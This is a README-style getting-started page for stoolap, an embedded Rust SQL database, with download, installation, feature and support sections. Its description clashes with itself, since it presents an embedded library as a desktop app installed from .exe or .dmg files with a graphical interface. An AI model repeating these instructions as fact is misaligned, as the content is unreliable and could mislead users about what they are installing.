๐ Getting Started
Thank you for your interest in stoolap! This guide will help you download and run stoolap easily, even if you have no programming background. stoolap is a modern embedded SQL database written in Rust. Its design allows for efficient data management without the complexity typically associated with database systems.
๐ฆ Download and Install

To get started, visit the releases page to download the latest version of stoolap:
Download stoolap
๐ System Requirements
Before downloading stoolap, ensure that your computer meets the following requirements:
- Operating System: Windows 10/11, macOS, or a recent version of Linux.
- Memory: At least 4 GB of RAM.
- Storage: Minimum of 100 MB available disk space.
- Network: Internet connection for initial download.
Once you have downloaded stoolap, follow these steps to run it:
-
Locate the downloaded file: Depending on your browser settings, this will likely be in your โDownloadsโ folder. The file should be named something like stoolap_x.xx.x.exe (Windows) or stoolap_x.xx.x.dmg (macOS).
- Install stoolap:
- Windows: Double-click the
.exe file to begin the installation. Follow the on-screen prompts.
- macOS: Open the
.dmg file, then drag the stoolap icon into your Applications folder.
- Linux: If you downloaded a tarball, extract it and run
./stoolap from your terminal.
- Open stoolap:
- On Windows, you will find it in your Start menu.
- On macOS, look in your Applications folder.
- On Linux, open the terminal and navigate to the folder where stoolap is located.
- First-time setup: When you open stoolap for the first time, follow the prompt to set up a new database.
๐ Key Features
- Embedded SQL: stoolap allows you to manage your data directly within your applications without needing a separate database server.
- MVCC Support: Utilize Multi-Version Concurrency Control, enabling you to handle multiple users reading and writing to the database smoothly.
- Written in Rust: stoolap uses Rust for high performance and reliability, ensuring your applicationโs data is stored safely and quickly.
- Simple Interface: Enjoy an intuitive user interface designed for ease of use.
๐ Usage Example
Here is how you can get started with your first database:
- After setting up, you will see a prompt to create a new database.
- Input a name for your database and select a storage location.
- Begin adding tables and data through the simple interface.
You can find further examples in the documentation on the releases page.
โ๏ธ Troubleshooting
If you encounter problems while using stoolap:
- Ensure your computer meets the system requirements.
- Restart the application if it doesnโt respond.
- Check the official documentation for common issues and solutions.
๐ Community and Support
Join our community for help and discussions:
- GitHub Issues: Report any bugs or request features.
- Discussion Forum: Connect with other users for tips and tricks.
๐งพ License
stoolap is open source software, licensed under the MIT License. Feel free to use, modify, and share it under the terms of this license.
For further details, visit the releases page to download the latest version and see updates.